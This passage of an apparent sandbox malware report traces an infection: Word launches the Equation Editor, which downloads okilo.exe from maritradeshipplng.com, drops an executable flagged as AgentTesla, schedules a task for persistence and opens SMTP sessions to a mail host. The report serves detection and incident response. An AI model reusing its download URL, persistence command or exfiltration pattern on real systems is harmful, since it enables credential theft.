                                                                                                            Jul 22, 2021 17:30:50.002854109 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.002857924 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.002872944 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.002892017 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.002897024 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.002912045 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.002912045 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.002918959 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.002931118 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.002954006 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.002969027 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.003912926 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.003931999 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.004044056 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.018613100 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.151793003 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.151832104 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.152087927 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.152314901 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.152347088 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.152409077 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.153651953 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.153681993 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.153724909 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.153753996 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.154829025 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.154922962 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.154959917 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.155019999 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.156039000 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.156059980 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.156172991 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.157257080 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.157274961 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.157332897 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.158557892 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.158576012 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.158631086 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.159801960 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.159821033 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.159907103 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.160964966 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.160986900 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.161034107 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.162210941 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.162228107 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.162308931 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.163527012 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.163552046 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.163635969 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.303291082 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.303550959 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.303674936 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.303766012 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.303828001 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.303849936 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.303881884 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.303906918 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.305068016 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.305090904 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.306332111 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.306374073 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.307533026 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.307564974 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.307565928 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.307586908 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.307590008 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.307624102 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.307626963 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.308765888 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.308789015 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.308861971 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.308923960 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.310014009 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.310040951 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.310108900 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.311230898 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.311255932 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.311331034 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.312470913 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.312498093 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.312556028 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.313693047 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.313719034 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.313795090 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.313821077 CEST4916780192.168.2.22104.21.27.166

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jul 22, 2021 17:30:49.501636028 CEST5219753192.168.2.228.8.8.8
                                                                                                            Jul 22, 2021 17:30:49.563747883 CEST53521978.8.8.8192.168.2.22
                                                                                                            Jul 22, 2021 17:31:50.287045002 CEST5309953192.168.2.228.8.8.8
                                                                                                            Jul 22, 2021 17:31:50.338172913 CEST53530998.8.8.8192.168.2.22
                                                                                                            Jul 22, 2021 17:31:52.189536095 CEST5283853192.168.2.228.8.8.8
                                                                                                            Jul 22, 2021 17:31:52.250142097 CEST53528388.8.8.8192.168.2.22
                                                                                                            Jul 22, 2021 17:31:52.250602961 CEST5283853192.168.2.228.8.8.8
                                                                                                            Jul 22, 2021 17:31:52.308823109 CEST53528388.8.8.8192.168.2.22
                                                                                                            Jul 22, 2021 17:31:52.335619926 CEST6120053192.168.2.228.8.8.8
                                                                                                            Jul 22, 2021 17:31:52.393990993 CEST53612008.8.8.8192.168.2.22
                                                                                                            Jul 22, 2021 17:31:58.546166897 CEST4954853192.168.2.228.8.8.8
                                                                                                            Jul 22, 2021 17:31:58.595217943 CEST53495488.8.8.8192.168.2.22
                                                                                                            Jul 22, 2021 17:31:58.595829010 CEST4954853192.168.2.228.8.8.8
                                                                                                            Jul 22, 2021 17:31:58.645998955 CEST53495488.8.8.8192.168.2.22
                                                                                                            Jul 22, 2021 17:32:05.951370955 CEST5562753192.168.2.228.8.8.8
                                                                                                            Jul 22, 2021 17:32:06.011358976 CEST53556278.8.8.8192.168.2.22
                                                                                                            Jul 22, 2021 17:32:06.012056112 CEST5562753192.168.2.228.8.8.8
                                                                                                            Jul 22, 2021 17:32:06.064508915 CEST53556278.8.8.8192.168.2.22
                                                                                                            Jul 22, 2021 17:32:14.860537052 CEST5600953192.168.2.228.8.8.8
                                                                                                            Jul 22, 2021 17:32:14.910052061 CEST53560098.8.8.8192.168.2.22
                                                                                                            Jul 22, 2021 17:32:14.910754919 CEST5600953192.168.2.228.8.8.8
                                                                                                            Jul 22, 2021 17:32:14.960225105 CEST53560098.8.8.8192.168.2.22
                                                                                                            Jul 22, 2021 17:32:25.041042089 CEST6186553192.168.2.228.8.8.8
                                                                                                            Jul 22, 2021 17:32:25.101026058 CEST53618658.8.8.8192.168.2.22
                                                                                                            Jul 22, 2021 17:32:32.681997061 CEST5517153192.168.2.228.8.8.8
                                                                                                            Jul 22, 2021 17:32:32.733392954 CEST53551718.8.8.8192.168.2.22
                                                                                                            Jul 22, 2021 17:32:32.734611988 CEST5517153192.168.2.228.8.8.8
                                                                                                            Jul 22, 2021 17:32:32.786246061 CEST53551718.8.8.8192.168.2.22

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                            Jul 22, 2021 17:30:49.501636028 CEST192.168.2.228.8.8.80xa6edStandard query (0)maritradeshipplng.comA (IP address)IN (0x0001)
                                                                                                            Jul 22, 2021 17:31:50.287045002 CEST192.168.2.228.8.8.80xd78fStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                                            Jul 22, 2021 17:31:58.546166897 CEST192.168.2.228.8.8.80xc191Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                                            Jul 22, 2021 17:31:58.595829010 CEST192.168.2.228.8.8.80xc191Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                                            Jul 22, 2021 17:32:05.951370955 CEST192.168.2.228.8.8.80x2339Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                                            Jul 22, 2021 17:32:06.012056112 CEST192.168.2.228.8.8.80x2339Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                                            Jul 22, 2021 17:32:14.860537052 CEST192.168.2.228.8.8.80xdad7Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                                            Jul 22, 2021 17:32:14.910754919 CEST192.168.2.228.8.8.80xdad7Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                                            Jul 22, 2021 17:32:25.041042089 CEST192.168.2.228.8.8.80x41b6Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                                            Jul 22, 2021 17:32:32.681997061 CEST192.168.2.228.8.8.80xbe06Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                                            Jul 22, 2021 17:32:32.734611988 CEST192.168.2.228.8.8.80xbe06Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                            Jul 22, 2021 17:30:49.563747883 CEST8.8.8.8192.168.2.220xa6edNo error (0)maritradeshipplng.com104.21.27.166A (IP address)IN (0x0001)
                                                                                                            Jul 22, 2021 17:30:49.563747883 CEST8.8.8.8192.168.2.220xa6edNo error (0)maritradeshipplng.com172.67.169.145A (IP address)IN (0x0001)
                                                                                                            Jul 22, 2021 17:31:50.338172913 CEST8.8.8.8192.168.2.220xd78fNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                                            Jul 22, 2021 17:31:58.595217943 CEST8.8.8.8192.168.2.220xc191No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                                            Jul 22, 2021 17:31:58.645998955 CEST8.8.8.8192.168.2.220xc191No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                                            Jul 22, 2021 17:32:06.011358976 CEST8.8.8.8192.168.2.220x2339No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                                            Jul 22, 2021 17:32:06.064508915 CEST8.8.8.8192.168.2.220x2339No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                                            Jul 22, 2021 17:32:14.910052061 CEST8.8.8.8192.168.2.220xdad7No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                                            Jul 22, 2021 17:32:14.960225105 CEST8.8.8.8192.168.2.220xdad7No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                                            Jul 22, 2021 17:32:25.101026058 CEST8.8.8.8192.168.2.220x41b6No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                                            Jul 22, 2021 17:32:32.733392954 CEST8.8.8.8192.168.2.220xbe06No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                                            Jul 22, 2021 17:32:32.786246061 CEST8.8.8.8192.168.2.220xbe06No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • maritradeshipplng.com

                                                                                                            HTTP Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                            0192.168.2.2249167104.21.27.16680C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                            Jul 22, 2021 17:30:49.633574009 CEST0OUTGET /wayss/okilo.exe HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                            Host: maritradeshipplng.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Jul 22, 2021 17:30:50.002737045 CEST2INHTTP/1.1 200 OK
                                                                                                            Date: Thu, 22 Jul 2021 15:30:49 GMT
                                                                                                            Content-Type: application/octet-stream
                                                                                                            Content-Length: 918016
                                                                                                            Connection: keep-alive
                                                                                                            Last-Modified: Thu, 22 Jul 2021 07:16:32 GMT
                                                                                                            ETag: "e0200-5c7b11105d9f8"
                                                                                                            Accept-Ranges: bytes
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A4WScKmZaLuRICl5Vg8CWsrWHYZxehHOeC9R%2Fs8kP8xwh%2F0GSl%2F6oRcZSoMzklCMUv%2B2QB5AuT7aOfp81JZ0a8ZaFRiQxuOa%2F2x4XKv8LFBLHelWLzwkMQ8813jnYWu9lWjtKT5SQCE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 672db66479d040e9-LHR
                                                                                                            alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 79 1a f9 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 56 0c 00 00 a8 01 00 00 00 00 00 6e 75 0c 00 00 20 00 00 00 80 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0e 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 75 0c 00 4b 00 00 00 00 a0 0c 00 14 a3 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 55 0c 00 00 20 00 00 00 56 0c 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 18 00 00 00 00 80 0c 00 00 02 00 00 00 5a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 14 a3 01 00 00 a0 0c 00 00 a4 01 00 00 5c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0e 00 00 02 00 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELy`Vnu @ @ uK` H.texttU V `.sdataZ@.rsrc\@@.reloc`@B


                                                                                                            SMTP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                            Jul 22, 2021 17:31:50.744883060 CEST58749168198.54.122.60192.168.2.22220 PrivateEmail.com prod Mail Node
                                                                                                            Jul 22, 2021 17:31:50.745497942 CEST49168587192.168.2.22198.54.122.60EHLO 066656
                                                                                                            Jul 22, 2021 17:31:50.934009075 CEST58749168198.54.122.60192.168.2.22250-mta-08.privateemail.com
                                                                                                            250-PIPELINING
                                                                                                            250-SIZE 81788928
                                                                                                            250-ETRN
                                                                                                            250-AUTH PLAIN LOGIN
                                                                                                            250-ENHANCEDSTATUSCODES
                                                                                                            250-8BITMIME
                                                                                                            250-CHUNKING
                                                                                                            250 STARTTLS
                                                                                                            Jul 22, 2021 17:31:50.934842110 CEST49168587192.168.2.22198.54.122.60STARTTLS
                                                                                                            Jul 22, 2021 17:31:51.122312069 CEST58749168198.54.122.60192.168.2.22220 Ready to start TLS
                                                                                                            Jul 22, 2021 17:31:59.024944067 CEST58749170198.54.122.60192.168.2.22220 PrivateEmail.com prod Mail Node
                                                                                                            Jul 22, 2021 17:31:59.025263071 CEST49170587192.168.2.22198.54.122.60EHLO 066656
                                                                                                            Jul 22, 2021 17:31:59.212789059 CEST58749170198.54.122.60192.168.2.22250-mta-08.privateemail.com
                                                                                                            250-PIPELINING
                                                                                                            250-SIZE 81788928
                                                                                                            250-ETRN
                                                                                                            250-AUTH PLAIN LOGIN
                                                                                                            250-ENHANCEDSTATUSCODES
                                                                                                            250-8BITMIME
                                                                                                            250-CHUNKING
                                                                                                            250 STARTTLS
                                                                                                            Jul 22, 2021 17:31:59.213057041 CEST49170587192.168.2.22198.54.122.60STARTTLS
                                                                                                            Jul 22, 2021 17:31:59.400476933 CEST58749170198.54.122.60192.168.2.22220 Ready to start TLS
                                                                                                            Jul 22, 2021 17:32:06.450463057 CEST58749171198.54.122.60192.168.2.22220 PrivateEmail.com prod Mail Node
                                                                                                            Jul 22, 2021 17:32:06.450862885 CEST49171587192.168.2.22198.54.122.60EHLO 066656
                                                                                                            Jul 22, 2021 17:32:06.641848087 CEST58749171198.54.122.60192.168.2.22250-mta-08.privateemail.com
                                                                                                            250-PIPELINING
                                                                                                            250-SIZE 81788928
                                                                                                            250-ETRN
                                                                                                            250-AUTH PLAIN LOGIN
                                                                                                            250-ENHANCEDSTATUSCODES
                                                                                                            250-8BITMIME
                                                                                                            250-CHUNKING
                                                                                                            250 STARTTLS
                                                                                                            Jul 22, 2021 17:32:06.642119884 CEST49171587192.168.2.22198.54.122.60STARTTLS
                                                                                                            Jul 22, 2021 17:32:06.832670927 CEST58749171198.54.122.60192.168.2.22220 Ready to start TLS
                                                                                                            Jul 22, 2021 17:32:15.340521097 CEST58749172198.54.122.60192.168.2.22220 PrivateEmail.com prod Mail Node
                                                                                                            Jul 22, 2021 17:32:15.340907097 CEST49172587192.168.2.22198.54.122.60EHLO 066656
                                                                                                            Jul 22, 2021 17:32:15.528687954 CEST58749172198.54.122.60192.168.2.22250-mta-08.privateemail.com
                                                                                                            250-PIPELINING
                                                                                                            250-SIZE 81788928
                                                                                                            250-ETRN
                                                                                                            250-AUTH PLAIN LOGIN
                                                                                                            250-ENHANCEDSTATUSCODES
                                                                                                            250-8BITMIME
                                                                                                            250-CHUNKING
                                                                                                            250 STARTTLS
                                                                                                            Jul 22, 2021 17:32:15.529095888 CEST49172587192.168.2.22198.54.122.60STARTTLS
                                                                                                            Jul 22, 2021 17:32:15.718035936 CEST58749172198.54.122.60192.168.2.22220 Ready to start TLS
                                                                                                            Jul 22, 2021 17:32:25.486705065 CEST58749173198.54.122.60192.168.2.22220 PrivateEmail.com prod Mail Node
                                                                                                            Jul 22, 2021 17:32:25.487236023 CEST49173587192.168.2.22198.54.122.60EHLO 066656
                                                                                                            Jul 22, 2021 17:32:25.682280064 CEST58749173198.54.122.60192.168.2.22250-mta-08.privateemail.com
                                                                                                            250-PIPELINING
                                                                                                            250-SIZE 81788928
                                                                                                            250-ETRN
                                                                                                            250-AUTH PLAIN LOGIN
                                                                                                            250-ENHANCEDSTATUSCODES
                                                                                                            250-8BITMIME
                                                                                                            250-CHUNKING
                                                                                                            250 STARTTLS
                                                                                                            Jul 22, 2021 17:32:25.682760000 CEST49173587192.168.2.22198.54.122.60STARTTLS
                                                                                                            Jul 22, 2021 17:32:25.878017902 CEST58749173198.54.122.60192.168.2.22220 Ready to start TLS
                                                                                                            Jul 22, 2021 17:32:33.166738033 CEST58749174198.54.122.60192.168.2.22220 PrivateEmail.com prod Mail Node
                                                                                                            Jul 22, 2021 17:32:33.167226076 CEST49174587192.168.2.22198.54.122.60EHLO 066656
                                                                                                            Jul 22, 2021 17:32:33.357281923 CEST58749174198.54.122.60192.168.2.22250-mta-08.privateemail.com
                                                                                                            250-PIPELINING
                                                                                                            250-SIZE 81788928
                                                                                                            250-ETRN
                                                                                                            250-AUTH PLAIN LOGIN
                                                                                                            250-ENHANCEDSTATUSCODES
                                                                                                            250-8BITMIME
                                                                                                            250-CHUNKING
                                                                                                            250 STARTTLS
                                                                                                            Jul 22, 2021 17:32:33.357748032 CEST49174587192.168.2.22198.54.122.60STARTTLS
                                                                                                            Jul 22, 2021 17:32:33.546351910 CEST58749174198.54.122.60192.168.2.22220 Ready to start TLS

                                                                                                            Code Manipulations

                                                                                                            Statistics

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Start time:17:30:35
                                                                                                            Start date:22/07/2021
                                                                                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                                            Imagebase:0x13f7e0000
                                                                                                            File size:1424032 bytes
                                                                                                            MD5 hash:95C38D04597050285A18F66039EDB456
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Start time:17:30:36
                                                                                                            Start date:22/07/2021
                                                                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                            Imagebase:0x400000
                                                                                                            File size:543304 bytes
                                                                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Start time:17:30:39
                                                                                                            Start date:22/07/2021
                                                                                                            Path:C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                                                                                                            Imagebase:0x9d0000
                                                                                                            File size:918016 bytes
                                                                                                            MD5 hash:E85A0E1E81ACBCEA6A0E10EEEDF32F6D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            • Detection: 24%, ReversingLabs
                                                                                                            Reputation:low

                                                                                                            General

                                                                                                            Start time:17:31:04
                                                                                                            Start date:22/07/2021
                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JxCmQoa' /XML 'C:\Users\user\AppData\Local\Temp\tmp2E52.tmp'
                                                                                                            Imagebase:0xbf0000
                                                                                                            File size:179712 bytes
                                                                                                            MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Start time:17:31:05
                                                                                                            Start date:22/07/2021
                                                                                                            Path:C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                                                                                                            Imagebase:0x9d0000
                                                                                                            File size:918016 bytes
                                                                                                            MD5 hash:E85A0E1E81ACBCEA6A0E10EEEDF32F6D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2347741002.00000000028A5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2347741002.00000000028A5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2346238680.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000002.2346238680.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2347049705.0000000002461000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2347049705.0000000002461000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2347184343.000000000250A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2347184343.000000000250A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            Reputation:low

                                                                                                            Disassembly

